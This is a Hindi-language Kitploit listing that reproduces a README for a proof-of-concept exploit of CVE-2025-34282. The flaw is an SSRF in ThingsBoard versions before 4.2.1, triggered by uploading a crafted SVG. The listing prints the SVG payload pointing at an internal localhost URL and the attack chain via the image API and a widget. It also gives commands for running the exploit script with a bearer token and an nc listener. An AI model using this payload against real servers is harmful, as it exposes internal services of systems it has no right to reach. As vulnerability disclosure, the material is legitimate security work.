Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
thingsboard-ssrf-cve-2025-34282 — CVE-2025-34282 के लिए PoC शोषण - SVG छवि अपलोड के माध्यम से ThingsBoard SSRF | Kitploit
उपकरण/GitHubGitHub/mathitam/thingsboard-ssrf-cve-2025-34282
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmathitam/thingsboard-ssrf-cve-2025-34282

thingsboard-ssrf-cve-2025-34282

CVE-2025-34282 के लिए PoC शोषण - SVG छवि अपलोड के माध्यम से ThingsBoard SSRF

रिपॉजिटरी देखें
35 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-34282 — SVG छवि अपलोड के माध्यम से ThingsBoard SSRF

अवलोकन

ThingsBoard IoT Platform के 4.2.1 से पहले के संस्करणों में सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) कमजोरी।

टेनेंट एडमिन एक्सेस वाला हमलावर इमेज अपलोड गैलरी के माध्यम से एक आंतरिक URL संदर्भ वाली क्राफ्टेड SVG फ़ाइल अपलोड कर सकता है। जब ThingsBoard सर्वर-साइड पर SVG को प्रोसेस करता है, तो वह संदर्भित URL को लाता है — जिससे इंटरनेट पर उपलब्ध नहीं होने वाली आंतरिक सेवाओं तक पहुंच मिलती है।

फ़ील्डविवरण
CVECVE-2025-34282
प्रभावित संस्करण< 4.2.1
फिक्स्ड संस्करण4.2.1
CVSS स्कोर6.9 मध्यम
CWECWE-918 (सर्वर-साइड रिक्वेस्ट फोर्जरी)
विक्रेताhttps://thingsboard.io

हमला श्रृंखला

  1. टेनेंट एडमिन POST /api/image पर एक दुर्भावनापूर्ण SVG अपलोड करता है
    • सर्वर SVG को प्रोसेस करता है और एम्बेडेड URL पर एक आउटबाउंड अनुरोध जारी करता है
  2. SVG के publicLink को <object> टैग के माध्यम से एम्बेड करते हुए एक कस्टम विजेट बनाया जाता है
    • विजेट रेंडर भी सर्वर-साइड फ़ेच को ट्रिगर करता है

SVG पेलोड

ssrf_localhost_5555.svg पेलोड एक आंतरिक URL संदर्भ एम्बेड करता है:

root@kitploit:~
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />

अपलोड करने पर, ThingsBoard का सर्वर http://127.0.0.1:5555 लाता है, जो SSRF की पुष्टि करता है।

उपयोग

आवश्यकताएं:

root@kitploit:~
pip install requests

चलाएं:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>

उदाहरण:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...

एक्सप्लॉइट चलाने से पहले SSRF कॉलबैक को पकड़ने के लिए एक लिसनर शुरू करें:

root@kitploit:~
nc -l 5555

संदर्भ

  • https://www.cve.org/CVERecord?id=CVE-2025-34282

लेखक

Tamil Mathi T.

टूल डाउनलोड करें